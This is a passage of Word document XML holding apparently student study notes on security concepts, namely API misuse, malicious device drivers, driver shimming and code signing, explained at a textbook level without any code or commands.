        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>third parties to build upon a platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610FC53" w14:textId="03E1F899" w:rsidR="00A105D2" w:rsidRDefault="00A105D2" w:rsidP="00A105D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However, </w:t>
      </w:r>
      <w:r w:rsidR="00A44D24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APIs if not regulated properly could lead to the unauthorized use of functions</w:t>
      </w:r>
      <w:r w:rsidR="00E34883">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5854A" w14:textId="6D1FEDDF" w:rsidR="00E34883" w:rsidRDefault="00E34883" w:rsidP="00A105D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Some APIs are not public and some required keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145AAA7" w14:textId="21EFA1AE" w:rsidR="00E34883" w:rsidRPr="001A77C8" w:rsidRDefault="00E34883" w:rsidP="00E34883">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Driver Manipulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A9C61" w14:textId="351763B1" w:rsidR="00E34883" w:rsidRDefault="000F50DE" w:rsidP="00E34883">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Device Drivers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> play an important role in computing by serving as the software interface between hardware devices and operating systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD87C1" w14:textId="7771873E" w:rsidR="004E3E86" w:rsidRDefault="004E3E86" w:rsidP="004E3E8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They are the reason you can use almost any printer from a wide variety of manufacturers from any Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0FF4F" w14:textId="2F136718" w:rsidR="003102AD" w:rsidRDefault="003102AD" w:rsidP="003102AD">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Windows doesn’t design the software for their system to use printers, they provide </w:t>
      </w:r>
      <w:r w:rsidR="00BE74D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>manufacturers the ability to write drivers to support their own hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123CD16" w14:textId="35B09E90" w:rsidR="00BE74D6" w:rsidRDefault="00BE74D6" w:rsidP="00BE74D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Drivers </w:t>
      </w:r>
      <w:r w:rsidR="00106979">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>provide instructions to OS on how to interact with the hardware, but this requires low-level access to the OS and runs with admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE250D" w14:textId="56087305" w:rsidR="00106979" w:rsidRDefault="001C089E" w:rsidP="0010697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Of course, if the driver is malicious, it could gain full control of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A5F39" w14:textId="3204374F" w:rsidR="001C089E" w:rsidRDefault="001C089E" w:rsidP="001C089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Attackers could </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>refactor</w:t>
      </w:r>
      <w:r w:rsidR="006449E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an existing driver if they have the source code to it (which is very uncommon and difficult) </w:t>
      </w:r>
      <w:r w:rsidR="00786F4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and add malicious elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05469FC9" w14:textId="4D01CAF5" w:rsidR="00786F4F" w:rsidRDefault="00786F4F" w:rsidP="001C089E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shimming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used if the driver source code is not accessible which takes a legitimate driver and wraps a malicious driver around the outside of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E724E73" w14:textId="3995121A" w:rsidR="00B945B7" w:rsidRDefault="00B945B7" w:rsidP="00B945B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The malicious driver, known as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, receives requests from the operating system and simply passes them on the legitimate driver so that the device functions normally. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F4704" w14:textId="56959022" w:rsidR="00C42A22" w:rsidRDefault="00C42A22" w:rsidP="00C42A2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But at the same time, the driver can carry out its malware payload in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317AE64" w14:textId="7F30AFAF" w:rsidR="00C42A22" w:rsidRDefault="00C42A22" w:rsidP="00C42A2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Modern OS all contain protections against malicious drivers however</w:t>
      </w:r>
      <w:r w:rsidR="00047F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which includes </w:t>
      </w:r>
      <w:r w:rsidR="00047F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>code signing</w:t>
      </w:r>
      <w:r w:rsidR="00047F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E5780" w14:textId="552C344E" w:rsidR="00047F80" w:rsidRPr="0069794A" w:rsidRDefault="00047F80" w:rsidP="0069794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This is literally just a digital sign that verifies the code is actually from the manufacturer.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00047F80" w:rsidRPr="0069794A">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674CB" w14:textId="77777777" w:rsidR="00EA277B" w:rsidRDefault="00EA277B" w:rsidP="005744CD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="215933F4" w14:textId="77777777" w:rsidR="00EA277B" w:rsidRDefault="00EA277B" w:rsidP="00574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63663" w14:textId="77777777" w:rsidR="00EA277B" w:rsidRDefault="00EA277B" w:rsidP="005744CD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7352527C" w14:textId="77777777" w:rsidR="00EA277B" w:rsidRDefault="00EA277B" w:rsidP="005744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76FE1" w14:textId="1958A545" w:rsidR="005744CD" w:rsidRDefault="005744CD">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Chapter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4B7CC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59101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5095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D30"/>
    <w:rsid w:val="00001529"/>
    <w:rsid w:val="00007041"/>
    <w:rsid w:val="00007733"/>
    <w:rsid w:val="000114D5"/>
    <w:rsid w:val="0001585A"/>
    <w:rsid w:val="000201B9"/>
    <w:rsid w:val="00042C10"/>
    <w:rsid w:val="0004412C"/>
    <w:rsid w:val="000472DA"/>
    <w:rsid w:val="00047F80"/>
    <w:rsid w:val="000525AF"/>
    <w:rsid w:val="00055F78"/>
    <w:rsid w:val="00060840"/>
    <w:rsid w:val="0008192C"/>
    <w:rsid w:val="000855EF"/>
    <w:rsid w:val="00091F3A"/>
    <w:rsid w:val="00093726"/>
    <w:rsid w:val="000A558D"/>
    <w:rsid w:val="000B1AE7"/>
    <w:rsid w:val="000D69D5"/>
    <w:rsid w:val="000D7D50"/>
    <w:rsid w:val="000E2F7E"/>
    <w:rsid w:val="000E3DBD"/>
    <w:rsid w:val="000E5193"/>
    <w:rsid w:val="000F26B4"/>
    <w:rsid w:val="000F50DE"/>
    <w:rsid w:val="00102DB1"/>
    <w:rsid w:val="00103082"/>
    <w:rsid w:val="00106979"/>
    <w:rsid w:val="00106CCE"/>
    <w:rsid w:val="00111919"/>
    <w:rsid w:val="00117149"/>
    <w:rsid w:val="00123E92"/>
    <w:rsid w:val="00132390"/>
    <w:rsid w:val="001404AB"/>
    <w:rsid w:val="001441FC"/>
    <w:rsid w:val="001604DD"/>
    <w:rsid w:val="00164809"/>
    <w:rsid w:val="00180563"/>
    <w:rsid w:val="001852E3"/>
    <w:rsid w:val="00185DB3"/>
    <w:rsid w:val="00186BB0"/>
    <w:rsid w:val="00190423"/>
    <w:rsid w:val="00193C46"/>
    <w:rsid w:val="001942AD"/>
    <w:rsid w:val="00195652"/>
    <w:rsid w:val="001A43E7"/>
    <w:rsid w:val="001A5172"/>
    <w:rsid w:val="001A77C8"/>
    <w:rsid w:val="001B3CDD"/>
    <w:rsid w:val="001C089E"/>
    <w:rsid w:val="001C20CF"/>
    <w:rsid w:val="001C3553"/>
    <w:rsid w:val="001C7969"/>
    <w:rsid w:val="001D071B"/>
    <w:rsid w:val="001D2F72"/>
    <w:rsid w:val="001D61C5"/>
    <w:rsid w:val="001E0F11"/>
    <w:rsid w:val="001E4171"/>
    <w:rsid w:val="001E75D3"/>
    <w:rsid w:val="0020082C"/>
    <w:rsid w:val="0020168F"/>
    <w:rsid w:val="00204DC4"/>
    <w:rsid w:val="00205D30"/>
    <w:rsid w:val="0021247C"/>
    <w:rsid w:val="00216F31"/>
    <w:rsid w:val="0022331F"/>
    <w:rsid w:val="00224BB2"/>
    <w:rsid w:val="00235BFE"/>
    <w:rsid w:val="00247E47"/>
    <w:rsid w:val="00253022"/>
    <w:rsid w:val="00266D6B"/>
    <w:rsid w:val="00267596"/>
    <w:rsid w:val="00292798"/>
    <w:rsid w:val="00297564"/>
    <w:rsid w:val="002A29E3"/>
    <w:rsid w:val="002B1B42"/>
    <w:rsid w:val="002B2B78"/>
    <w:rsid w:val="002B610F"/>
    <w:rsid w:val="002D42DF"/>
    <w:rsid w:val="002E0D48"/>
    <w:rsid w:val="002E6790"/>
    <w:rsid w:val="002F0A1C"/>
    <w:rsid w:val="002F150B"/>
    <w:rsid w:val="002F37B7"/>
    <w:rsid w:val="002F76F4"/>
    <w:rsid w:val="002F7E33"/>
    <w:rsid w:val="003020D2"/>
    <w:rsid w:val="00302C8A"/>
    <w:rsid w:val="00307029"/>
    <w:rsid w:val="003102AD"/>
    <w:rsid w:val="003149BF"/>
    <w:rsid w:val="0032320A"/>
    <w:rsid w:val="003251F7"/>
    <w:rsid w:val="00334993"/>
    <w:rsid w:val="0033539F"/>
    <w:rsid w:val="003414BE"/>
    <w:rsid w:val="00357D9C"/>
    <w:rsid w:val="00362A4B"/>
    <w:rsid w:val="00367894"/>
    <w:rsid w:val="00372BF0"/>
    <w:rsid w:val="00375182"/>
    <w:rsid w:val="003765AC"/>
    <w:rsid w:val="0037679B"/>
    <w:rsid w:val="00390DCD"/>
    <w:rsid w:val="00391978"/>
    <w:rsid w:val="00393F2B"/>
    <w:rsid w:val="00397B43"/>
    <w:rsid w:val="003A1FE1"/>
    <w:rsid w:val="003A706F"/>
    <w:rsid w:val="003B3FDA"/>
    <w:rsid w:val="003B5BB7"/>
    <w:rsid w:val="003C0CE0"/>
    <w:rsid w:val="003C0E66"/>
    <w:rsid w:val="003C2177"/>
    <w:rsid w:val="003C4FE6"/>
    <w:rsid w:val="003C732A"/>
    <w:rsid w:val="003E09C8"/>
    <w:rsid w:val="003E4471"/>
    <w:rsid w:val="003E4548"/>
    <w:rsid w:val="003F5C23"/>
    <w:rsid w:val="003F5C37"/>
    <w:rsid w:val="003F68E1"/>
    <w:rsid w:val="003F6D5F"/>
    <w:rsid w:val="00405D98"/>
    <w:rsid w:val="0041278F"/>
    <w:rsid w:val="0041477C"/>
    <w:rsid w:val="00424348"/>
    <w:rsid w:val="004274F3"/>
    <w:rsid w:val="004403AB"/>
    <w:rsid w:val="00441021"/>
    <w:rsid w:val="004638BB"/>
    <w:rsid w:val="00465871"/>
    <w:rsid w:val="00467969"/>
    <w:rsid w:val="00470A12"/>
    <w:rsid w:val="00475B9C"/>
    <w:rsid w:val="0048032F"/>
    <w:rsid w:val="00491B7E"/>
    <w:rsid w:val="004A13A1"/>
    <w:rsid w:val="004B5D57"/>
    <w:rsid w:val="004C212B"/>
    <w:rsid w:val="004D2BFE"/>
    <w:rsid w:val="004D5732"/>
    <w:rsid w:val="004E3E86"/>
    <w:rsid w:val="004F41AE"/>
    <w:rsid w:val="004F4A30"/>
    <w:rsid w:val="004F55A5"/>
    <w:rsid w:val="004F74BF"/>
    <w:rsid w:val="00501A43"/>
    <w:rsid w:val="00505528"/>
    <w:rsid w:val="00507DB4"/>
    <w:rsid w:val="00511203"/>
    <w:rsid w:val="00516E6E"/>
    <w:rsid w:val="005214E5"/>
    <w:rsid w:val="00522B2A"/>
    <w:rsid w:val="00530EC0"/>
    <w:rsid w:val="00533680"/>
    <w:rsid w:val="0055601B"/>
    <w:rsid w:val="00561D86"/>
    <w:rsid w:val="00563FCD"/>
    <w:rsid w:val="005744CD"/>
    <w:rsid w:val="005772CC"/>
    <w:rsid w:val="00581A43"/>
    <w:rsid w:val="0059136C"/>
    <w:rsid w:val="005974E5"/>
    <w:rsid w:val="005A72C3"/>
    <w:rsid w:val="005B5D0A"/>
    <w:rsid w:val="005B612A"/>
    <w:rsid w:val="005C2964"/>
    <w:rsid w:val="005C30D5"/>
    <w:rsid w:val="005C6293"/>
    <w:rsid w:val="005D4B52"/>
    <w:rsid w:val="00601D58"/>
    <w:rsid w:val="00612A51"/>
    <w:rsid w:val="00620987"/>
    <w:rsid w:val="00623C6C"/>
    <w:rsid w:val="006258CE"/>
    <w:rsid w:val="006449E3"/>
    <w:rsid w:val="00652E82"/>
    <w:rsid w:val="0066172A"/>
    <w:rsid w:val="00665507"/>
    <w:rsid w:val="00670E76"/>
    <w:rsid w:val="0067342F"/>
    <w:rsid w:val="006768B1"/>
    <w:rsid w:val="00687041"/>
    <w:rsid w:val="00690CD1"/>
    <w:rsid w:val="0069332F"/>
    <w:rsid w:val="00693412"/>
    <w:rsid w:val="00696B99"/>
    <w:rsid w:val="0069794A"/>
    <w:rsid w:val="006A0612"/>
    <w:rsid w:val="006A2506"/>
    <w:rsid w:val="006A4207"/>
    <w:rsid w:val="006A55ED"/>
    <w:rsid w:val="006A634D"/>
    <w:rsid w:val="006A788E"/>
    <w:rsid w:val="006B0211"/>
    <w:rsid w:val="006B79B6"/>
    <w:rsid w:val="006C6208"/>
    <w:rsid w:val="006D16BC"/>
    <w:rsid w:val="006D7624"/>
    <w:rsid w:val="006E7B72"/>
    <w:rsid w:val="00700383"/>
    <w:rsid w:val="007013AC"/>
    <w:rsid w:val="00704DCA"/>
    <w:rsid w:val="007058B8"/>
    <w:rsid w:val="00710876"/>
    <w:rsid w:val="00711357"/>
    <w:rsid w:val="007263C1"/>
    <w:rsid w:val="0073687B"/>
    <w:rsid w:val="007516AE"/>
    <w:rsid w:val="00752F20"/>
    <w:rsid w:val="00754EF6"/>
    <w:rsid w:val="00754F36"/>
    <w:rsid w:val="00760D9D"/>
    <w:rsid w:val="00763BF3"/>
    <w:rsid w:val="00771C47"/>
    <w:rsid w:val="0077444E"/>
    <w:rsid w:val="00774F49"/>
    <w:rsid w:val="00777B82"/>
    <w:rsid w:val="00785C65"/>
    <w:rsid w:val="00785FF9"/>
    <w:rsid w:val="00786F4F"/>
    <w:rsid w:val="0078759F"/>
    <w:rsid w:val="007918EF"/>
    <w:rsid w:val="00796469"/>
    <w:rsid w:val="007977F1"/>
    <w:rsid w:val="007B218B"/>
    <w:rsid w:val="007B432C"/>
    <w:rsid w:val="007C3750"/>
    <w:rsid w:val="007D1A92"/>
    <w:rsid w:val="007D55E3"/>
    <w:rsid w:val="007E5119"/>
    <w:rsid w:val="007E5820"/>
    <w:rsid w:val="007E6A64"/>
    <w:rsid w:val="007F1D64"/>
    <w:rsid w:val="007F3BA8"/>
    <w:rsid w:val="00805EB0"/>
    <w:rsid w:val="008117E8"/>
    <w:rsid w:val="00812AFF"/>
    <w:rsid w:val="00813D17"/>
    <w:rsid w:val="008210A7"/>
    <w:rsid w:val="008261B5"/>
    <w:rsid w:val="00832FBF"/>
    <w:rsid w:val="00833D01"/>
    <w:rsid w:val="0084271B"/>
    <w:rsid w:val="0085044B"/>
    <w:rsid w:val="008518F4"/>
    <w:rsid w:val="008521B7"/>
    <w:rsid w:val="008561EA"/>
    <w:rsid w:val="008608F8"/>
    <w:rsid w:val="0088080F"/>
    <w:rsid w:val="00883141"/>
    <w:rsid w:val="00891A1E"/>
    <w:rsid w:val="008939CA"/>
    <w:rsid w:val="008B0CDB"/>
    <w:rsid w:val="008C0AA3"/>
    <w:rsid w:val="008C3EB2"/>
    <w:rsid w:val="008D41B4"/>
    <w:rsid w:val="008E058D"/>
    <w:rsid w:val="008E05E4"/>
    <w:rsid w:val="008E283A"/>
    <w:rsid w:val="008E2D06"/>
    <w:rsid w:val="008E5270"/>
    <w:rsid w:val="008E587F"/>
    <w:rsid w:val="008F0D01"/>
    <w:rsid w:val="00904EC2"/>
    <w:rsid w:val="0091507F"/>
    <w:rsid w:val="00924E1A"/>
    <w:rsid w:val="00930041"/>
    <w:rsid w:val="00933892"/>
    <w:rsid w:val="00941181"/>
    <w:rsid w:val="009419D6"/>
    <w:rsid w:val="00947543"/>
    <w:rsid w:val="00950A91"/>
    <w:rsid w:val="009527A0"/>
    <w:rsid w:val="00953624"/>
    <w:rsid w:val="00954622"/>
    <w:rsid w:val="00964A90"/>
    <w:rsid w:val="00966142"/>
    <w:rsid w:val="00967F18"/>
    <w:rsid w:val="00976C45"/>
    <w:rsid w:val="00984FC0"/>
    <w:rsid w:val="0098504B"/>
    <w:rsid w:val="009922E9"/>
    <w:rsid w:val="0099520C"/>
    <w:rsid w:val="009A360F"/>
    <w:rsid w:val="009B1644"/>
    <w:rsid w:val="009B3058"/>
    <w:rsid w:val="009B7800"/>
    <w:rsid w:val="009B7A40"/>
    <w:rsid w:val="009C424B"/>
    <w:rsid w:val="009C5A16"/>
    <w:rsid w:val="009D2F8D"/>
    <w:rsid w:val="009E45F7"/>
    <w:rsid w:val="009E544F"/>
    <w:rsid w:val="009E5B6C"/>
    <w:rsid w:val="009E5E77"/>
    <w:rsid w:val="009F75E5"/>
    <w:rsid w:val="00A015A9"/>
    <w:rsid w:val="00A105D2"/>
    <w:rsid w:val="00A130B4"/>
    <w:rsid w:val="00A250BB"/>
    <w:rsid w:val="00A44D24"/>
    <w:rsid w:val="00A50598"/>
    <w:rsid w:val="00A527D9"/>
    <w:rsid w:val="00A5392C"/>
    <w:rsid w:val="00A6152D"/>
    <w:rsid w:val="00A623AD"/>
    <w:rsid w:val="00A81BAB"/>
    <w:rsid w:val="00A82FDB"/>
    <w:rsid w:val="00AA2A2C"/>
    <w:rsid w:val="00AB09C4"/>
    <w:rsid w:val="00AC25DF"/>
    <w:rsid w:val="00AD69A2"/>
    <w:rsid w:val="00AE0545"/>
    <w:rsid w:val="00AE2D31"/>
    <w:rsid w:val="00AE4D42"/>
    <w:rsid w:val="00AE4E94"/>
    <w:rsid w:val="00AE5733"/>
    <w:rsid w:val="00AE6190"/>
    <w:rsid w:val="00AE6A34"/>
    <w:rsid w:val="00AF64AC"/>
    <w:rsid w:val="00B01E69"/>
    <w:rsid w:val="00B1112E"/>
    <w:rsid w:val="00B2008D"/>
    <w:rsid w:val="00B2229C"/>
    <w:rsid w:val="00B24519"/>
    <w:rsid w:val="00B30A52"/>
    <w:rsid w:val="00B32A67"/>
    <w:rsid w:val="00B33D84"/>
    <w:rsid w:val="00B42E3B"/>
    <w:rsid w:val="00B42ED7"/>
    <w:rsid w:val="00B44EE5"/>
    <w:rsid w:val="00B522E4"/>
    <w:rsid w:val="00B55440"/>
    <w:rsid w:val="00B57385"/>
    <w:rsid w:val="00B62F46"/>
    <w:rsid w:val="00B77785"/>
    <w:rsid w:val="00B803F2"/>
    <w:rsid w:val="00B81739"/>
    <w:rsid w:val="00B846D2"/>
    <w:rsid w:val="00B876D6"/>
    <w:rsid w:val="00B945B7"/>
    <w:rsid w:val="00BA56E8"/>
    <w:rsid w:val="00BA5D6D"/>
    <w:rsid w:val="00BA71C5"/>
    <w:rsid w:val="00BB0E6D"/>
    <w:rsid w:val="00BE01C2"/>
    <w:rsid w:val="00BE74D6"/>
    <w:rsid w:val="00BF1964"/>
    <w:rsid w:val="00BF2504"/>
    <w:rsid w:val="00C00E7F"/>
    <w:rsid w:val="00C10024"/>
    <w:rsid w:val="00C12805"/>
    <w:rsid w:val="00C163F7"/>
    <w:rsid w:val="00C16989"/>
    <w:rsid w:val="00C205AB"/>
    <w:rsid w:val="00C20B3C"/>
    <w:rsid w:val="00C276FB"/>
    <w:rsid w:val="00C30F79"/>
    <w:rsid w:val="00C3109B"/>
    <w:rsid w:val="00C405A6"/>
    <w:rsid w:val="00C42A22"/>
    <w:rsid w:val="00C50457"/>
    <w:rsid w:val="00C556D8"/>
    <w:rsid w:val="00C55AAF"/>
    <w:rsid w:val="00C770C9"/>
    <w:rsid w:val="00C771B3"/>
    <w:rsid w:val="00C773FB"/>
    <w:rsid w:val="00C91064"/>
    <w:rsid w:val="00C95634"/>
    <w:rsid w:val="00CA4D3D"/>
    <w:rsid w:val="00CB6544"/>
    <w:rsid w:val="00CC2B08"/>
    <w:rsid w:val="00CC2E60"/>
    <w:rsid w:val="00CD1699"/>
    <w:rsid w:val="00CD5277"/>
    <w:rsid w:val="00CD5751"/>
    <w:rsid w:val="00CD6665"/>
    <w:rsid w:val="00CE071E"/>
    <w:rsid w:val="00CE29E8"/>
    <w:rsid w:val="00CE58E3"/>
    <w:rsid w:val="00CE7B5C"/>
    <w:rsid w:val="00CF2994"/>
    <w:rsid w:val="00CF29E2"/>
    <w:rsid w:val="00D02FDA"/>
    <w:rsid w:val="00D06746"/>
    <w:rsid w:val="00D108F7"/>
    <w:rsid w:val="00D223DB"/>
    <w:rsid w:val="00D3201B"/>
    <w:rsid w:val="00D32D10"/>
    <w:rsid w:val="00D3641B"/>
    <w:rsid w:val="00D441E1"/>
    <w:rsid w:val="00D46C50"/>
    <w:rsid w:val="00D527E8"/>
    <w:rsid w:val="00D55A9A"/>
    <w:rsid w:val="00D61016"/>
    <w:rsid w:val="00D66F12"/>
    <w:rsid w:val="00D72A10"/>
    <w:rsid w:val="00D96568"/>
    <w:rsid w:val="00D97B02"/>
    <w:rsid w:val="00DA3E5F"/>
    <w:rsid w:val="00DA4005"/>
    <w:rsid w:val="00DB18AA"/>
    <w:rsid w:val="00DC3759"/>
    <w:rsid w:val="00DD3F75"/>
    <w:rsid w:val="00DD5155"/>
    <w:rsid w:val="00DD6F37"/>
    <w:rsid w:val="00DD72EC"/>
    <w:rsid w:val="00DE44A1"/>
    <w:rsid w:val="00DE68FC"/>
    <w:rsid w:val="00DF3BF3"/>
    <w:rsid w:val="00DF518F"/>
    <w:rsid w:val="00E2068F"/>
    <w:rsid w:val="00E20D83"/>
    <w:rsid w:val="00E2284D"/>
    <w:rsid w:val="00E34883"/>
    <w:rsid w:val="00E36F0A"/>
    <w:rsid w:val="00E37183"/>
    <w:rsid w:val="00E376F0"/>
    <w:rsid w:val="00E40969"/>
    <w:rsid w:val="00E41078"/>
    <w:rsid w:val="00E46563"/>
    <w:rsid w:val="00E5144A"/>
    <w:rsid w:val="00E579DD"/>
    <w:rsid w:val="00E60440"/>
    <w:rsid w:val="00E609BE"/>
    <w:rsid w:val="00E72417"/>
    <w:rsid w:val="00E76399"/>
    <w:rsid w:val="00E83D5A"/>
    <w:rsid w:val="00E9039E"/>
    <w:rsid w:val="00E92AE2"/>
    <w:rsid w:val="00E93392"/>
    <w:rsid w:val="00EA277B"/>
    <w:rsid w:val="00EB43AC"/>
    <w:rsid w:val="00EB688E"/>
    <w:rsid w:val="00EC0E6F"/>
    <w:rsid w:val="00EC1082"/>
    <w:rsid w:val="00ED2896"/>
    <w:rsid w:val="00ED29D2"/>
    <w:rsid w:val="00ED4853"/>
    <w:rsid w:val="00EE137C"/>
    <w:rsid w:val="00EE14D7"/>
    <w:rsid w:val="00EE4A2D"/>
    <w:rsid w:val="00EF2275"/>
    <w:rsid w:val="00EF3161"/>
    <w:rsid w:val="00EF525E"/>
    <w:rsid w:val="00EF7B7B"/>
    <w:rsid w:val="00F2312D"/>
    <w:rsid w:val="00F23CF7"/>
    <w:rsid w:val="00F24A6A"/>
    <w:rsid w:val="00F26D63"/>
    <w:rsid w:val="00F33217"/>
    <w:rsid w:val="00F40309"/>
    <w:rsid w:val="00F47BA7"/>
    <w:rsid w:val="00F51A48"/>
    <w:rsid w:val="00F5398E"/>
    <w:rsid w:val="00F674A7"/>
    <w:rsid w:val="00F675B6"/>
    <w:rsid w:val="00F849A3"/>
    <w:rsid w:val="00F86DB2"/>
    <w:rsid w:val="00F927AF"/>
    <w:rsid w:val="00F9281E"/>
    <w:rsid w:val="00F94287"/>
    <w:rsid w:val="00F9455C"/>
    <w:rsid w:val="00F94FB6"/>
    <w:rsid w:val="00FA5A9B"/>
    <w:rsid w:val="00FB2AE4"/>
    <w:rsid w:val="00FC3C8B"/>
    <w:rsid w:val="00FC4565"/>
    <w:rsid w:val="00FD5FD2"/>
    <w:rsid w:val="00FE189A"/>
    <w:rsid w:val="00FE7306"/>
    <w:rsid w:val="00FE7811"/>
    <w:rsid w:val="00FF26F6"/>
    <w:rsid w:val="00FF6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EF07"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9066954F-462A-4792-8E95-E991F7FE6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4CD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
